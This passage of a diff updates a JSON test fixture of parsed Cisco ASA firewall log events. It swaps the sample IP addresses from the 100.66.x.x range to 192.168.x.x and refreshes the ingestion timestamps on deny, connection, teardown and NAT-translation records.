"100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6763,7 +6763,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6772,8 +6772,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111703927Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363668300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6809,8 +6809,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" 
@@ -6844,7 +6844,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6853,8 +6853,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111705650Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363673400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6890,8 +6890,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6925,7 +6925,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6934,8 +6934,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111707305Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363678600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6971,8 +6971,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7006,7 +7006,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, 
@@ -7015,8 +7015,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111709033Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363683100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7052,8 +7052,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7087,7 +7087,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7096,8 +7096,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111710675Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363687500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7133,8 +7133,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7168,7 +7168,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, 
@@ -7177,8 +7177,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111712385Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363692300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7214,8 +7214,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7249,7 +7249,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7258,8 +7258,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111714077Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363698500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7295,8 +7295,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7330,7 +7330,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, 
@@ -7339,8 +7339,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111715703Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363703100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7376,8 +7376,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7411,7 +7411,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7420,8 +7420,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111717377Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363707100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7457,8 +7457,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7492,7 +7492,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, 
@@ -7501,8 +7501,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111719061Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363711Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7538,8 +7538,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7573,7 +7573,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7582,8 +7582,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111720693Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363716Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7619,8 +7619,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7654,7 +7654,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, 
@@ -7663,8 +7663,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111722323Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363720800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7695,8 +7695,8 @@ }, "destination": { "port": 8279, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1275, @@ -7736,7 +7736,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -7744,8 +7744,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111724118Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:100.66.98.44/8279", + "ingested": "2021-12-09T13:31:36.363725300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -7778,8 +7778,8 @@ }, "source": { "port": 80, - "address": "100.66.205.99", - "ip": "100.66.205.99" + "address": "192.168.205.99", + "ip": "192.168.205.99" }, "tags": [ "preserve_original_event" @@ -7814,7 +7814,7 @@ "localhost" ], "ip": [ - "100.66.205.99", + "192.168.205.99", "172.31.98.44" ] }, 
@@ -7823,8 +7823,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111725754Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", + "ingested": "2021-12-09T13:31:36.363729900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -7840,7 +7840,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.99", + "mapped_source_ip": "192.168.205.99", "connection_id": "11799", "source_interface": "outside", "mapped_destination_port": 1275 @@ -7857,8 +7857,8 @@ }, "destination": { "port": 1190, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, @@ -7898,7 +7898,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -7906,8 +7906,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111727405Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1190", + "ingested": "2021-12-09T13:31:36.363734Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -7940,8 +7940,8 @@ }, "source": { "port": 53, - "address": "100.66.14.30", - "ip": "100.66.14.30" + "address": "192.168.14.30", + "ip": "192.168.14.30" }, "tags": [ "preserve_original_event" 
@@ -7976,7 +7976,7 @@ "localhost" ], "ip": [ - "100.66.14.30", + "192.168.14.30", "172.31.98.44" ] }, @@ -7985,8 +7985,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111729107Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:100.66.14.30/53 (100.66.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363738Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -8002,7 +8002,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.14.30", + "mapped_source_ip": "192.168.14.30", "connection_id": "11800", "source_interface": "outside", "mapped_destination_port": 56132 @@ -8024,8 +8024,8 @@ }, "source": { "port": 53, - "address": "100.66.14.30", - "ip": "100.66.14.30" + "address": "192.168.14.30", + "ip": "192.168.14.30" }, "tags": [ "preserve_original_event" @@ -8060,7 +8060,7 @@ "localhost" ], "ip": [ - "100.66.14.30", + "192.168.14.30", "172.31.98.44" ] }, @@ -8070,8 +8070,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111730826Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:100.66.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", + "ingested": "2021-12-09T13:31:36.363742800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -8108,8 +8108,8 @@ }, "source": { "port": 53, - "address": "100.66.252.210", - "ip": "100.66.252.210" + "address": "192.168.252.210", + "ip": "192.168.252.210" }, "tags": [ "preserve_original_event" @@ -8144,7 +8144,7 @@ "localhost" ], "ip": [ - "100.66.252.210", + "192.168.252.210", "172.31.98.44" ] }, @@ -8153,8 +8153,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111732496Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:100.66.252.210/53 (100.66.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363748800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -8170,7 +8170,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.210", + "mapped_source_ip": "192.168.252.210", "connection_id": "11801", "source_interface": "outside", "mapped_destination_port": 56132 @@ -8192,8 +8192,8 @@ }, "source": { "port": 53, - "address": "100.66.252.210", - "ip": "100.66.252.210" + "address": "192.168.252.210", + "ip": "192.168.252.210" }, "tags": [ "preserve_original_event" @@ -8228,7 +8228,7 @@ "localhost" ], "ip": [ - "100.66.252.210", + "192.168.252.210", "172.31.98.44" ] }, 
@@ -8238,8 +8238,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111734134Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:100.66.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", + "ingested": "2021-12-09T13:31:36.363753400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8271,8 +8271,8 @@ }, "destination": { "port": 8280, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1276, @@ -8312,7 +8312,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8320,8 +8320,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111735796Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280", + "ingested": "2021-12-09T13:31:36.363758Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8354,8 +8354,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8390,7 +8390,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -8399,8 +8399,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111737422Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", + "ingested": "2021-12-09T13:31:36.363763Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -8416,7 +8416,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11802", "source_interface": "outside", "mapped_destination_port": 1276 @@ -8433,8 +8433,8 @@ }, "destination": { "port": 8281, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1277, @@ -8474,7 +8474,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8482,8 +8482,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111739111Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281", + "ingested": "2021-12-09T13:31:36.363769100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8516,8 +8516,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -8552,7 +8552,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8561,8 +8561,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111740789Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", + "ingested": "2021-12-09T13:31:36.363773600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -8578,7 +8578,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11803", "source_interface": "outside", "mapped_destination_port": 1277 @@ -8600,8 +8600,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8636,7 +8636,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8647,8 +8647,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111742487Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:100.66.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", + "ingested": "2021-12-09T13:31:36.363778500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -8680,8 +8680,8 @@ }, "destination": { "port": 8282, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1278, @@ -8721,7 +8721,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8729,8 +8729,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111744117Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282", + "ingested": "2021-12-09T13:31:36.363783Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8763,8 +8763,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8799,7 +8799,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8808,8 +8808,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111745758Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", + "ingested": "2021-12-09T13:31:36.363788200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -8825,7 +8825,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11804", "source_interface": "outside", "mapped_destination_port": 1278 @@ -8847,8 +8847,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8883,7 +8883,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8894,8 +8894,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111747624Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:100.66.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", + "ingested": "2021-12-09T13:31:36.363792700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8927,8 +8927,8 @@ }, "destination": { "port": 8283, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1279, @@ -8968,7 +8968,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -8976,8 +8976,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111749322Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283", + "ingested": "2021-12-09T13:31:36.363797800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9010,8 +9010,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9046,7 +9046,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9055,8 +9055,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111751044Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", + "ingested": "2021-12-09T13:31:36.363802900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9072,7 +9072,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11805", "source_interface": "outside", "mapped_destination_port": 1279 @@ -9094,8 +9094,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
